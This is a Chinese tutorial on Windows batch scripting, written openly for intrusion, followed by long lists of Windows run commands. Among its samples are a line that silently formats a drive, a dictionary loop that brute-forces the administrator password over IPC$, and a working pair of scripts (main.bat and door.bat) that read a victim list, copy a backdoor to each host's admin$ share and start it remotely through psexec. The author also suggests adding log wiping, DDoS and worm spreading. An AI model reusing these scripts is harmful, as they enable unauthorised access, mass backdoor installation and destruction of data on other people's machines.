Batch批处理轻松编写

1.Echo 命令 
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 
语法 
echo [{on|off}] [message] 
Sample:echo off / echo hello world 
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 

2.@ 命令 
表示不显示@后面的命令,在入侵过程中(例如使用 批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 
Sample:@echo off 
@echo Now initializing the program,please wait a minite... 
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。) 

3.Goto 命令 
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 
语法:goto label (label是参数,指定所要转向的 批处理程序中的行。) 
Sample: 
if {%1}=={} goto noparms 
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) 
@Rem check parameters if null show usage 
:noparms 
echo Usage: monitor.bat ServerIP PortNumber 
goto end 
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 

4.Rem 命令 
注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 
Rem Message 
Sample:@Rem Here is the description. 

5.Pause 命令 
运行 Pause 命令时,将显示下面的消息: 
Press any key to continue . . . 
Sample: 
@echo off 
:begin 
copy a:*.* d:\back 
echo Please put a new disk into driver A 
pause 
goto begin 
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。 

6.Call 命令 
从一个 批处理程序调用另一个 批处理程序,并且不终止父 批处理程序。call 命令接受用作调用目标的标签。如果在脚本或 批处理文件外使用 Call,它将不会在命令行起作用。 
语法 
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 
参数 
[Drive:}[Path] FileName 
指定要调用的 批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 

7.start 命令 
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。 
入侵常用参数: 
MIN 开始时窗口最小化 
SEPARATE 在分开的空间内开始 16 位 Windows 程序 
HIGH 在 HIGH 优先级类别开始应用程序 
REALTIME 在 REALTIME 优先级类别开始应用程序 
WAIT 启动应用程序并等候它结束 
parameters 这些为传送到命令/程序的参数 
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 
8.choice 命令 
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 

如: choice /c:dme defrag,mem,end 
将显示 
defrag,mem,end[D,M,E]? 
Sample: 
Sample.bat的内容如下: 
@echo off 
choice /c:dme defrag,mem,end 
if errorlevel 3 goto defrag (应先判断数值最高的错误码) 
if errorlevel 2 goto mem 
if errotlevel 1 goto end 

:defrag 
c:\dos\defrag 
goto end 
:mem 
mem 
goto end 
:end 
echo good bye 

此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。 

9.If 命令 

if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式: 
1、if "参数" == "字符串" 待执行的命令 
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 
如if "%1"=="a" format a: 
if {%1}=={} goto noparms 
if {%2}=={} goto noparms 

2、if exist 文件名 待执行的命令 
如果有指定的文件,则条件成立,运行命令,否则运行下一句。 
如if exist config.sys edit config.sys 

3、if errorlevel / if not errorlevel 数字 待执行的命令 
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 
如if errorlevel 2 goto x2 
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。 

10.for 命令 
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 
批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 

for {%variable|%%variable} in (set) do command [ CommandLineOptions] 
%variable 指定一个单一字母可替换的参数。 
(set) 指定一个或一组文件。可以使用通配符。 
command 指定对每个文件执行的命令。 
command-parameters 为特定命令指定参数或命令行开关。 
批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I 

如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 
支持: 

FOR /D %variable IN (set) DO command [command-parameters] 

如果集中包含通配符,则指定与目录名匹配,而不与文件 
名匹配。 

FOR /R [[drive:]path] %variable IN (set) DO command [command- 

检查以 [drive:]path 为根的目录树,指向每个目录中的 
FOR 语句。如果在 /R 后没有指定目录,则使用当前 
目录。如果集仅为一个单点(.)字符,则枚举该目录树。 

FOR /L %variable IN (start,step,end) DO command [command-para 

该集表示以增量形式从开始到结束的一个数字序列。 
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 
序列 (5 4 3 2 1)。 

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN (command) DO command 

或者,如果有 usebackq 选项: 

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN (command) DO command 

filenameset 为一个或多个文件名。继续到 filenameset 中的 
下一个文件之前,每份文件都已被打开、读取并经过处理。 
处理包括读取文件,将其分成一行行的文字,然后将每行 
解析成零或更多的符号。然后用已找到的符号字符串变量值 
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 
的第一个空白符号。跳过空白行。您可通过指定可选 "options" 
参数替代默认解析操作。这个带引号的字符串包括一个或多个 
指定不同解析选项的关键字。这些关键字为: 

eol=c - 指一个行注释字符的结尾(就一个) 
skip=n - 指在文件开始时忽略的行数。 
delims=xxx - 指分隔符集。这个替换了空格和跳格键的 
默认分隔符集。 
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 
的 for 本身。这会导致额外变量名称的 
格式为一个范围。通过 nth 符号指定 m 
符号字符串中的最后一个字符星号, 
那么额外的变量将在最后一个符号解析之 
分配并接受行的保留文本。 
usebackq - 指定新语法已在下类情况中使用: 
在作为命令执行一个后引号的字符串并且 
引号字符为文字字符串命令并允许在 fi 
中使用双引号扩起文件名称。 

sample1: 
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 

会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 
每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 
空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 
取得第二个符号,引用 %j 来取得第三个符号,引用 %k 
来取得第三个符号后的所有剩余符号。对于带有空格的文件 
名,您需要用双引号将文件名括起来。为了用这种方式来使 
用双引号,您还需要使用 usebackq 选项,否则,双引号会 
被理解成是用作定义某个要分析的字符串的。 

%i 专门在 for 语句中得到说明,%j 和 %k 是通过 
tokens= 选项专门得到说明的。您可以通过 tokens= 一行 
指定最多 26 个符号,只要不试图说明一个高于字母 z 或 
Z 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 
同时不能有 52 个以上都在使用中。 

您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 
用单引号将括号之间的 filenameset 括起来。这样,该字符 
串会被当作一个文件中的一个单一输入行。 

最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 
括号之间的 filenameset 变成一个反括字符串。该字符串会 
被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 
内存,并被当作文件分析。因此,以下例子: 

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 

会枚举当前环境中的环境变量名称。 

另外,FOR 变量参照的替换已被增强。您现在可以使用下列 
选项语法: 

~I - 删除任何引号("),扩充 %I 
%~fI - 将 %I 扩充到一个完全合格的路径名 
%~dI - 仅将 %I 扩充到一个驱动器号 
%~pI - 仅将 %I 扩充到一个路径 
%~nI - 仅将 %I 扩充到一个文件名 
%~xI - 仅将 %I 扩充到一个文件扩展名 
%~sI - 扩充的路径只含有短名 
%~aI - 将 %I 扩充到文件的文件属性 
%~tI - 将 %I 扩充到文件的日期/时间 
%~zI - 将 %I 扩充到文件的大小 
%~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 
到找到的第一个完全合格的名称。如果环境变量 
未被定义,或者没有找到文件,此组合键会扩充 
空字符串 

可以组合修饰符来得到多重结果: 

%~dpI - 仅将 %I 扩充到一个驱动器号和路径 
%~nxI - 仅将 %I 扩充到一个文件名和扩展名 
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 
%~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 
到找到的第一个驱动器号和路径。 
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR 

在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 
比较易读,而且避免与不分大小写的组合键混淆。 

以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。 

sample2: 

利用For命令来实现对一台目标Win2k主机的暴力密码破解。 
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 
最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- 
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。 

sample3: 

你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用 批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。 

主要命令也只有一条:(在 批处理文件中使用 FOR 命令时,指定变量使用 %%variable) 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k 
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。 
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。 
代码雏形: 

--------------- cut here then save as a batchfile(I call it main.bat ) -------------------- 
@echo off 
@if "%1"=="" goto usage 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k 
@goto end 
:usage 
@echo run this batch in dos modle.or just double-click it. 
:end 
--------------- cut here then save as a batchfile(I call it main.bat ) -------------------- 

------------------- cut here then save as a batchfile(I call it door.bat) ----------------- 
@net use \\%1\ipc$ %3 /u:"%2" 
@if errorlevel 1 goto failed 
@echo Trying to establish the IPC$ connection …………OK 
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt 
@p***ec \\%1 c:\winnt\system32\windrv32.exe 
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt 
:failed 
@echo Sorry can not connected to the victim. 
----------------- cut here then save as a batchfile(I call it door.bat) ------------------- 
这只是一个自动种植后门 批处理的雏形,两个 批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究 



有关某个命令的详细信息,请键入 HELP 命令名 
ASSOC 显示或修改文件扩展名关联。 
AT 计划在计算机上运行的命令和程序。 
ATTRIB 显示或更改文件属性。 
BREAK 设置或清除扩展式 CTRL+C 检查。 
CACLS 显示或修改文件的访问控制列表(ACLs)。 
CALL 从另一个 批处理程序调用这一个。 
CD 显示当前目录的名称或将其更改。 
CHCP 显示或设置活动代码页数。 
CHDIR 显示当前目录的名称或将其更改。 
CHKDSK 检查磁盘并显示状态报告。 
CHKNTFS 显示或修改启动时间磁盘检查。 
CLS 清除屏幕。 
CMD 打开另一个 Windows 命令解释程序窗口。 
COLOR 设置默认控制台前景和背景颜色。 
COMP 比较两个或两套文件的内容。 
COMPACT 显示或更改 NTFS 分区上文件的压缩。 
CONVERT 将 FAT 卷转换成 NTFS。您不能转换 
当前驱动器。 
COPY 将至少一个文件复制到另一个位置。 
DATE 显示或设置日期。 
DEL 删除至少一个文件。 
DIR 显示一个目录中的文件和子目录。 
DISKCOMP 比较两个软盘的内容。 
DISKCOPY 将一个软盘的内容复制到另一个软盘。 
DOSKEY 编辑命令行、调用 Windows 命令并创建宏。 
ECHO 显示消息,或将命令回显打开或关上。 
ENDLOCAL 结束批文件中环境更改的本地化。 
ERASE 删除至少一个文件。 
EXIT 退出 CMD.EXE 程序(命令解释程序)。 
FC 比较两个或两套文件,并显示 
不同处。 
FIND 在文件中搜索文字字符串。 
FINDSTR 在文件中搜索字符串。 
FOR 为一套文件中的每个文件运行一个指定的命令。 
FORMAT 格式化磁盘,以便跟 Windows 使用。 
FTYPE 显示或修改用于文件扩展名关联的文件类型。 
GOTO 将 Windows 命令解释程序指向 批处理程序 
中某个标明的行。 
GRAFTABL 启用 Windows 来以图像模式显示 
扩展字符集。 
HELP 提供 Windows 命令的帮助信息。 
IF 执行 批处理程序中的条件性处理。 
LABEL 创建、更改或删除磁盘的卷标。 
MD 创建目录。 
MKDIR 创建目录。 
MODE 配置系统设备。 
MORE 一次显示一个结果屏幕。 
MOVE 将文件从一个目录移到另一个目录。 
PATH 显示或设置可执行文件的搜索路径。 
PAUSE 暂停批文件的处理并显示消息。 
POPD 还原 PUSHD 保存的当前目录的上一个值。 
PRINT 打印文本文件。 
PROMPT 更改 Windows 命令提示符。 
PUSHD 保存当前目录,然后对其进行更改。 
RD 删除目录。 
RECOVER 从有问题的磁盘恢复可读信息。 
REM 记录批文件或 CONFIG.SYS 中的注释。 
REN 重命名文件。 
RENAME 重命名文件。 
REPLACE 替换文件。 
RMDIR 删除目录。 
SET 显示、设置或删除 Windows 环境变量。 
SETLOCAL 开始批文件中环境更改的本地化。 
SHIFT 更换批文件中可替换参数的位置。 
SORT 对输入进行分类。 
START 启动另一个窗口来运行指定的程序或命令。 
SUBST 将路径跟一个驱动器号关联。 
TIME 显示或设置系统时间。 
TITLE 设置 CMD.EXE 会话的窗口标题。 
TREE 以图形模式显示驱动器或路径的目录结构。 
TYPE 显示文本文件的内容。 
VER 显示 Windows 版本。 
VERIFY 告诉 Windows 是否验证文件是否已正确 
写入磁盘。 
VOL 显示磁盘卷标和序列号。 
XCOPY 复制文件和目录树。 


appwiz.cpl------------添加删除程序 

control userpasswords2--------用户帐户设置 

cleanmgr-------垃圾整理 

CMD--------------命令提示符可以当作是 Windows 的一个附件,Ping,Convert 这些不能在图形环境下 使用的功能要借助它来完成。 

cmd------jview察看Java虚拟机版本。 


command.com------调用的则是系统内置的 NTVDM,一个 DOS虚拟机。它完全是一个类似 Virtual PC 的 虚拟环境,和系统本身联系不大。当我们在命令提示符下运行 DOS 程序时,实际上也 是自动转移到 NTVDM虚拟机下,和 CMD 本身没什么关系。 


calc-----------启动计算器 

chkdsk.exe-----Chkdsk磁盘检查 

compmgmt.msc---计算机管理 

conf-----------启动 netmeeting 

control userpasswords2-----User Account 权限设置 

devmgmt.msc--- 设备管理器 

diskmgmt.msc---磁盘管理实用程序 

dfrg.msc-------磁盘碎片整理程序 

drwtsn32------ 系统医生 

dvdplay--------启动Media Player 

dxdiag-----------DirectX Diagnostic Tool 

gpedit.msc-------组策略编辑器 

gpupdate /target:computer /force 强制刷新组策略 

eventvwr.exe-----事件查看器 

explorer-------打开资源管理器 

logoff---------注销命令 

lusrmgr.msc----本机用户和组 

msinfo32---------系统信息 

msconfig---------系统配置实用程序 

net start (servicename)----启动该服务 

net stop (servicename)-----停止该服务 

notepad--------打开记事本 

nusrmgr.cpl-------同control userpasswords,打开用户帐户控制面板 

Nslookup-------IP地址侦测器 

oobe/msoobe /a----检查XP是否激活 

perfmon.msc----计算机性能监测程序 

progman--------程序管理器 

regedit----------注册表编辑器 

regedt32-------注册表编辑器 

regsvr32 /u *.dll----停止dll文件运行 

route print------查看路由表 

rononce -p ----15秒关机 

rsop.msc-------组策略结果集 

rundll32.exe rundll32.exe %Systemroot%System32shimgvw.dll,ImageView_Fullscreen----启动一个空白的Windows 图片和传真查看器 

secpol.msc--------本地安全策略 

services.msc---本地服务设置 

sfc /scannow-----启动系统文件检查器 

sndrec32-------录音机 

taskmgr-----任务管理器(适用于2000/xp/2003) 

tsshutdn-------60秒倒计时关机命令 

winchat--------XP自带局域网聊天 

winmsd---------系统信息 

winver-----显示About Windows 窗口 

wupdmgr-----------Windows Update 





winver 检查Windows版本 
wmimgmt.msc 打开Windows管理体系结构(wmi) 
wupdmgr Windows更新程序 
wscript. Windows脚本宿主设置 
write 写字板 
winmsd 系统信息 
wiaacmgr 扫描仪和照相机向导 
winchat xp自带局域网聊天 
mem.exe 显示内存使用情况 
msconfig.exe 系统配置实用程序 
mplayer2 简易widnows media player 
mspaint 画图板 
mstsc 远程桌面连接 
magnify 放大镜实用程序 
mmc 打开控制台 
mobsync 同步命令 

dxdiag 检查directx信息 
drwtsn32 系统医生 
devmgmt.msc 设备管理器 
dfrg.msc 磁盘碎片整理程序 
diskmgmt.msc 磁盘管理实用程序 
dcomcnfg 打开系统组件服务 
ddeshare 打开dde共享设置 
dvdplay dvd播放器 

net stop messenger 停止信使服务 
net start messenger 开始信使服务 
notepad 打开记事本 
nslookup 网络管理的工具向导 
ntbackup 系统备份和还原 
narrator 屏幕“讲述人” 
ntmsmgr.msc 移动存储管理器 
ntmsoprq.msc 移动存储管理员操作请求 
netstat -an (tc)命令检查接口 

syncapp 创建一个公文包 
sysedit 系统配置编辑器 
sigverif 文件签名验证程序 
sndrec32 录音机 
shrpubw 创建共享文件夹 
secpol.msc 本地安全策略 
syskey 系统加密,一旦加密就不能解开,保护Windows xp系统的双重密码 
services.msc 本地服务设置 
sndvol32 音量控制程序 
sfc.exe 系统文件检查器 
sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令 
tourstart xp简介(安装完成后出现的漫游xp程序) 
taskmgr 任务管理器 

eventvwr 事件查看器 
eudcedit 造字程序 
explorer 打开资源管理器 

packager 对象包装程序 
perfmon.msc 计算机性能监测程序 
progman 程序管理器 

regedit.exe 注册表 
rsop.msc 组策略结果集 
regedt32 注册表编辑器 
rononce -p 15秒关机 
regsvr32 /u *.dll 停止dll文件运行 
regsvr32 /u zipfldr.dll 取消zip支持 

cmd.exe cmd命令提示符 
chkdsk.exe chkdsk磁盘检查 
certmgr.msc 证书管理实用程序 
calc 启动计算器 
charmap 启动字符映射表 
cliconfg sql server 客户端网络实用程序 
clipbrd 剪贴板查看器 
conf 启动netmeeting 
compmgmt.msc 计算机管理 
cleanmgr 垃圾整理 
ciadv.msc 索引服务程序 

osk 打开屏幕键盘 
odbcad32 odbc数据源管理器 
oobe/msoobe /a 检查xp是否激活 
lusrmgr.msc 本机用户和组 
logoff 注销命令 

iexpress 木马捆绑工具,系统自带 

nslookup ip地址侦测器 

fsmgmt.msc 共享文件夹管理器 

utilman 辅助工具管理器 

gpedit.msc 组策略 

以下为Windows操作系统的常用运行命令,执行这些命令,就能打开系统对应的相关实用程序,如果大家能基本利用,就能检查并修复系统的最基本的故障,除注销,关闭系统命令外,其它所有命令,大家不妨一试!! 

运行\输入CMD\输入 对应的相关实用程序: 
. 打开C:\Documents and Settings\XXX(当前登录Windows XP的用户名) 
.. 打开Windows XP所在的盘符下的Documents and Settings文件夹 
... 打开“我的电脑”选项。 
accwiz.exe 辅助工具向导 
actmovie.exe 直接显示安装工具 
append.exe 允许程序打开制定目录中的数据 
arp.exe 显示和更改计算机的IP与硬件物理地址的对应列表 
at.exe 计划运行任务 
atmadm.exe ATM调用管理器统计 
attrib.exe 显示和更改文件和文件夹属性 
autochk.exe 检测修复文件系统 (XP不可用) 
autoconv.exe 在启动过程中自动转化系统 (XP不可用) 
autofmt.exe 在启动过程中格式化进程 (XP不可用) 
autolfn.exe 使用长文件名格式 (XP不可用) 
arp.exe 显示和更改计算机的IP与硬件物理地址的对应 
calc.exe 计算器 
Bootvrfy.exe 通报启动成功 
cacls.exe 显示和编辑ACL 
cdplayer.exe CD播放器 
change.exe 与终端服务器相关的查询 (XP不可用) 
charmap.exe 字符映射表 
chglogon.exe 启动或停用会话记录 (XP不可用) 
chgport.exe 改变端口(终端服务) (XP不可用) 
chgusr.exe 改变用户(终端服务) (XP不可用) 
chkdsk.exe 磁盘检测程序 
chkntfs.exe NTFS磁盘检测程序 
cidaemon.exe 组成Ci文档服务 
cipher.exe 在NTFS上显示或改变加密的文件或目录 
cisvc.exe 打开索引内容 
ckcnv.exe 变换Cookie 
cleanmgr.exe 磁盘清理 
cliconfg.exe SQL客户网络工具 
clipbrd.exe 剪贴簿查看器 
clipsrv.exe 运行Clipboard服务 
clspack.exe 建立系统文件列表清单 
cluster.exe 显示域的集群 (XP不可用) 
cmd.exe 进2000\XP DOS 
cmdl32.exe 自动下载连接管理 
cmmgr32.exe 连接管理器 
cmmon32.exe 连接管理器监视 
cmstp.exe 连接管理器配置文件安装程序 
comclust.exe 集群 
comp.exe 比较两个文件和文件集的内容 
conf 启动netmeeting聊天工具 
control userpasswords2 XP密码管理. 
compmgmt.msc 计算机管理 
cprofile.exe 转换显示模式 (XP不可用) 
开始,运行,输入CMD\输入net config workstation计算机名 \完整的计算机名\用户名 
工作站处于活动状态(即网络描述) \软件版本(即软件版本号) \工作站域 工作站域的 DNS 名称 
登录域 \COM 打开时间超时(秒) \COM 发送量(字节) \COM 发送超时 (msec) 
CMD\输入net config workstation 更改可配置工作站服务设置。 
CMD\输入net config server 可以显示不能配置的下服务器计算机名 \服务器注释 \服务器版本(即软件版本号) 
服务器处于活动状态(即网络描述) \服务器处于隐藏状态(即 /hidden 设置) 
最大登录用户数(即可使用服务器共享资源的最大用户数) 
每个会话打开文件的最大数(即用户可在一个会话中打开服务器文件的最大数) 
空闲会话时间(最小值) 
chkdsk.exe 磁盘检查. 
Chkdsk /r 2000命令控制台中的Chkdsk /r命令检查修复系统文件 
cleanmgr 垃圾整理 
Clipbrd 剪贴板查看器 
C:boot.ini 打开启动菜单 
compact.exe 显示或改变NTFS分区上文件的压缩状态 
conime.exe IME控制台 
control.exe 控制面板 
convert.exe NTFS 转换文件系统到NTFS 
convlog.exe 转换IIS日志文件格式到NCSA格式 
cprofile.exe 转换显示模式 
cscript.exe 脚本宿主版本 
csrss.exe 客户服务器Runtime进程 (XP不可用) 
csvde.exe 格式转换程序 (XP不可用) 
dcpromo 活动目录安装(XP不可用) 
drwtsn32 系统医生 
diskmgmt.msc 磁盘管理器(和PowerQuest PartitionMagic 8.0) 
dvdplay DVD 播放器 
devmgmt.msc 设备管理器(检查电脑硬件,驱动) 
dxdiag 检查DirectX信息 
dcomcnfg.exe DCOM配置属性 (控制台根目录) 
dcpromo.exe 安装向导 (XP不可用) 
ddeshare.exe DDE共享 
debug.exe 检查DEBUG 
dfrgfat.exe FAT分区磁盘碎片整理程序 
dfrgntfs.exe NTFS分区磁盘碎片整理程序 (XP不可用) 
dfs_cmd_.exe 配置DFS树 (XP不可用) 
dfsinit.exe 分布式文件系统初始化(XP不可用) 
dfssvc.exe 分布式文件系统服务器 (XP不可用) 
diantz.exe 制作CAB文件 
diskperf.exe 磁盘性能计数器 
dmremote.exe 磁盘管理服务的一部分 (XP不可用) 
doskey.exe 命令行创建宏 
dosx.exe DOS扩展 
dplaysvr.exe 直接运行帮助 (XP不可用) 
drwatson.exe 华生医生错误检测 
drwtsn32.exe 华生医生显示和配置管理 
dvdplay.exe DVD播放 
dxdiag.exe Direct-X诊断工具 
edlin.exe 命令行的文本编辑 
esentutl.exe MS数据库工具 
eudcedit.exe 造字程序 
eventvwr.exe 事件查看器 
exe2bin.exe 转换EXE文件到二进制 
expand.exe 解压缩 
extrac32.exe 解CAB工具 
fsmgmt.msc 共享文件夹 
fastopen.exe 快速访问在内存中的硬盘文件 
faxcover.exe 传真封面编辑 
faxqueue.exe 显示传真队列 
faxsend.exe 发送传真向导 
faxsvc.exe 启动传真服务 
fc.exe 比较两个文件的不同 
find.exe 查找文件中的文本行 
findstr.exe 查找文件中的行 
finger.exe 一个用户并显示出统计结果 
fixmapi.exe 修复MAPI文件 
flattemp.exe 允许或者禁用临时文件目录 (XP不可用) 
fontview.exe 显示字体文件中的字体 
forcedos.exe 强制文件在DOS模式下运行 
ftp.exeFTP下载 
gpedit.msc 组策略 
gdi.exe 图形界面驱动 
grpconv.exe 转换程序管理员组 
hostname.exe 显示机器的Hostname 
Internat 输入法图标 
iexpress 木马捆绑工具,系统自带 
ieshwiz.exe 自定义文件夹向导 
iexpress.exe iexpress安装包 
iisreset.exe 重启IIS服务(未安装IIS,不可用) 
internat.exe 键盘语言指示器 (XP不可用) 
ipconfig.exe 查看IP配置 
ipsecmon.exe IP安全监视器 
ipxroute.exe IPX路由和源路由控制程序 
irftp.exe 无线连接 
ismserv.exe 安装或者删除Service Control Manager中的服务 
jdbgmgr.exe Java4的调试器 
jetconv.exe 转换Jet Engine数据库 (XP不可用) 
jetpack.exe 压缩Jet数据库 (XP不可用) 
jview.exe Java的命令行装载者 
label.exe 改变驱动器的卷标 
lcwiz.exe 许可证向导 (XP不可用) 
ldifde.exe LDIF目录交换命令行管理 (XP不可用) 
licmgr.exe 终端服务许可协议管理 (XP不可用) 
lights.exe 显示连接状况 (XP不可用) 
llsmgr.exe Windows 2000 许可协议管理 (XP不可用) 
llssrv.exe 启动许可协议服务器 (XP不可用) 
locator.exe RPC Locator 远程定位 
lodctr.exe 调用性能计数 
logoff.exe 注销当前用户 
lpq.exe 显示远端的LPD打印队列的状态,显示被送到基于Unix的服务器的打印任务 
lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。 
lsass.exe 运行LSA和Server的DLL 
lserver.exe 指定默认Server新的DNS域 (XP不可用) 
lusrmgr.msc 本地账户管理 
mmc 控制台 
mplayer2 播放器 
macfile.exe 管理MACFILES (XP不可用) 
magnify.exe 放大镜 
makecab.exe 制作CAB文件 
mem.exe 显示内存状态 
migpwd.exe 迁移密码 
mmc.exe 控制台 
mnmsrvc.exe 远程桌面共享 
mobsync.exe 同步目录管理器 
mountvol.exe 创建、删除或列出卷的装入点。 
mplay32.exe Media Player 媒体播放器 
mpnotify.exe 通知应用程序 
mqbkup.exe 信息队列备份和恢复工具 
mqmig.exe MSMQ Migration Utility 信息队列迁移工具 
mrinfo.exe 使用SNMP多点传送路由 
mscdexnt.exe 安装MSCD 
msdtc.exe 动态事务处理控制台 
msg.exe 发送消息到本地或远程客户 
mshta.exe HTML应用程序主机 
msiexec.exe 开始Windows安装程序 
mspaint.exe 打开画图板 
mstask.exe 任务计划表程序 
mstinit.exe 任务计划表安装 
Msconfig.exe 系统配置实用程序 (配置启动选项,服务项) 
mem.exe 显示内存使用情况 
mspaint 画图板 
Net Stop Messenger 停止信使服务 
Net Start Messenger 恢复信使服务 
nslookup 网络管理的工具 
Nslookup IP 地址侦测器 
ntbackup 系统备份和还原 
nbtstat.exe 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。 
nddeapir.exe NDDE API服务器端 
netsh.exe 用于配置和监控 Windows 2000 命令行脚本接口(XP不可用) 
netstat.exe 显示协议统计和当前的 TCP/IP 网络连接。 
nlsfunc.exe 加载特定GJ的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。 
notepad.exe 打开记事本 
nslookup.exe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。 
ntbackup.exe 备份和故障修复工具 
ntfrs.exe NT文件复制服务 (XP不可用) 
ntvdm.exe 模拟16位Windows环境 
nw16.exe NetWare转向器 
nwscript.exe 运行Netware脚本 
odbcad32.exe 32位ODBC数据源管理 (驱动程序管理) 
odbcconf.exe 命令行配置ODBC驱动和数据源 
packager.exe 对象包装程序 
pathping.exe 包含Ping和Tracert的程序 
pentnt.exe 检查Pentium的浮点错误 
perfmon.exe 系统性能监视器 
ping.exe 验证与远程计算机的连接 
posix.exe 用于兼容Unix 
print.exe 打印文本文件或显示打印队列的内容。 
progman.exe 程序管理器 
psxss.exe Posix子系统应用程序 
qappsrv.exe 在网络上显示终端服务器可用的程序 
qprocess.exe 在本地或远程显示进程的信息(需终端服务) 
query.exe 查询进程和对话 (XP不可用) 
quser.exe 显示用户登陆的信息(需终端服务) 
qwinsta.exe 显示终端服务的信息 
rononce -p 15秒关机 
rasAdmin 远程访问服务. 
regedit.exe 注册表编辑器 
rasadmin.exe 启动远程访问服务 (XP不可用) 
rasautou.exe 建立一个RAS连接 
rasdial.exe 宽带,拨号连接 
ras.exe 运行RAS连接 (XP不可用) 
rcp.exe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件 
rdpclip.exe 终端和本地复制和粘贴文件 
recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。 
redir.exe 运行重定向服务 
